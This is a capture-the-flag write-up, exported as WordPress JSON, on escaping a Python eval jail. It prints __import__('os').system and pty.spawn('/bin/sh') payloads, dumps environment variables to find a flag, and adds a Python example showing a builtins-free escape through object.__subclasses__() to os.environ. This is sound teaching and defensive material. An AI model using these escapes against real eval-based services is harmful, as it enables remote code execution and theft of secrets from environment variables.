{"id":12987,"date":"2016-06-23T18:58:50","date_gmt":"2016-06-23T16:58:50","guid":{"rendered":"http:\/\/www.codilime.com\/?p=12987"},"modified":"2016-11-03T17:27:30","modified_gmt":"2016-11-03T16:27:30","slug":"backdoorctf16-worst-pwn-ever","status":"publish","type":"post","link":"https:\/\/codisec.com\/backdoorctf16-worst-pwn-ever\/","title":{"rendered":"WORST-PWN-EVER"},"content":{"rendered":"

Link: https:\/\/backdoor.sdslabs.co\/challenges\/WORST-PWN-EVER<\/a>
\nAuthor: Ashish Chaudhary
\nPoints: 100
\nCategory: pwn, Python<\/p>\n

Description<\/h2>\n

tocttou is an environmentalist. But some say he has a vicious motive and he uses nature to hide his dark side. We found a weird shell on his amazon (pun intended) web services. Can you tell us what he is up to?<\/p>\n

Tip: he might shut down the machine if he notices you – and he will (maybe in 45 seconds).
\nAccess: nc hack.bckdr.in 9008<\/p><\/blockquote>\n

tl;dr<\/h2>\n

We have been given a Python eval jail over a TCP socket. The solution is to retrieve an environment variable using one of the classic builtins tricks, for example: __import__('os').system('env | grep -iE \".*f.*l.*a.*g\"')<\/span><\/p>\n

Solution<\/h2>\n

After connecting to the given server a prompt is returned. Let's probe it with a few inputs.<\/p>\n

First let’s see what happens when we press CTRL+D<\/code> right away:<\/p>\n

> EOFError: EOF when reading a line\n--> WHAT ARE YOU DOING HERE? >-[<\/pre>\n

Let’s check if it is a system shell:<\/p>\n

> echo x\nSyntaxError: unexpected EOF while parsing (&lt;string&gt;, line 1)\n--> WHAT ARE YOU DOING HERE? >-[\n<\/pre>\n

No, it’s definitely not a system shell. It looks like a Python interpreter. Let’s check this theory then:<\/p>\n

> 1+1\n<\/pre>\n

No response and no error. The value of the expression is evidently not echoed back, which fits an eval()<\/code> whose result is discarded, so any output will have to come through a side channel such as an error message. Let's check whether Python errors are reported:<\/p>\n

\n> 1+'x'*[]\nTypeError: can't multiply sequence by non-int of type 'list'\n<\/pre>\n

Bingo! If this really is a bare eval()<\/code> with the builtins still reachable, we can escape with one of the classic builtins tricks: __import__<\/code>.<\/p>\n

Let’s check that:<\/p>\n

> str(__import__('os').system('echo x'))\nx\n<\/pre>\n

Got it! Note that expression values are still not echoed: the x<\/code> is the output of echo<\/code> itself, written to the socket that the jail's standard streams are attached to, so the str()<\/code> wrapper is not what made it visible. Let's get a shell and start looking around:<\/p>\n

> __import__('pty').spawn('\/bin\/sh')\nsh-4.3#\n<\/pre>\n

After looking through available files for a few minutes and finding nothing useful, we noticed the task description contains a clue – the word environmentalist<\/em> suggests checking environment variables.<\/p>\n
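Before the env dump, here is a local stand-in for what the prompt evidently is (an unsandboxed eval() that discards the value and prints exceptions), written as an added example that is not from the original writeup or the challenge. It runs the writeup's __import__ escape, shows that the usual {"__builtins__": {}} hardening stops it, and then reaches os.environ anyway through object.__subclasses__(), which is why stripping builtins is not a sandbox; find_flag_like reproduces the grep from the tl;dr over a constructed environment. jail_eval, find_flag_like, SAMPLE_ENV and the escape strings are names introduced here, not the challenge's own code.

```python
"""Added example, not part of the original writeup: a local stand-in for
the challenge's eval prompt, the two classic escapes, and the flag filter
from the tl;dr. jail_eval, find_flag_like, SAMPLE_ENV and the escape
strings are assumptions made here, not the challenge's own code."""
import re


def jail_eval(expr, restricted=False):
    """Emulate the remote prompt: evaluate one line, never echo its value,
    and report exceptions as 'ExcName: message' like the service did.
    restricted=True removes the builtins, the usual (insufficient) hardening."""
    scope = {"__builtins__": {}} if restricted else {}
    try:
        return ("ok", eval(expr, scope))  # deliberately unsafe: that is the jail
    except Exception as exc:
        return ("err", f"{type(exc).__name__}: {exc}")


# Escape 1 (the writeup's): builtins are reachable, so __import__ hands us os.
IMPORT_ESCAPE = "__import__('os').environ"

# Escape 2: builtins stripped. Walk object's subclasses to os._wrap_close, whose
# __init__ was defined in os.py and therefore carries os' module globals.
SUBCLASS_ESCAPE = (
    "[c for c in ().__class__.__base__.__subclasses__()"
    " if c.__name__ == '_wrap_close' and c.__module__ == 'os'][0]"
    ".__init__.__globals__['environ']"
)

# Same pattern as `env | grep -iE '.*f.*l.*a.*g'`: the letters f, l, a, g in
# order, anything in between, case-insensitive, anywhere in the KEY=VALUE line.
FLAG_RE = re.compile(r"f.*l.*a.*g", re.IGNORECASE)


def find_flag_like(environ):
    """Names of the variables whose KEY=VALUE line the grep would print."""
    return sorted(k for k, v in environ.items() if FLAG_RE.search(f"{k}={v}"))


# Constructed environment shaped like the dump in the writeup; placeholder value.
SAMPLE_ENV = {
    "HOSTNAME": "43523caef67d",
    "PATH": "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
    "_F_L_A_G_": "constructed-placeholder-not-the-real-flag",
    "PWD": "/scripts",
    "SHLVL": "3",
    "HOME": "/root",
    "_": "/usr/bin/env",
}


if __name__ == "__main__":
    print(jail_eval("1+'x'*[]"))                           # the TypeError seen remotely
    print(jail_eval("__import__('os')", restricted=True))  # NameError: hardening "works"
    env_a = jail_eval(IMPORT_ESCAPE)[1]
    env_b = jail_eval(SUBCLASS_ESCAPE, restricted=True)[1]
    print(env_a is env_b)                                  # True: same os.environ object
    print(find_flag_like(SAMPLE_ENV))                      # ['_F_L_A_G_']
```

Two caveats worth keeping in mind: the grep in the tl;dr matches the whole KEY=VALUE line, so a value that happens to contain f, l, a, g in that order would be printed as well, and the second escape is only one of many routes from object.__subclasses__() to os, which is why any real fix replaces eval() with a parser for the input you actually expect rather than trying to filter names.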

\nsh-4.3# env\nHOSTNAME=43523caef67d\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin\n_F_L_A_G_='xxxxxxxxxxxxxxx CENSORED xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'\nPWD=\/scripts\nSHLVL=3\nHOME=\/root\n_=\/usr\/bin\/env\n<\/pre>\n","protected":false},"excerpt":{"rendered":"


<\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[16],"tags":[7,19],"yoast_head":"\n\n\n\n\n\n\n\n\n\n\n\n\t\n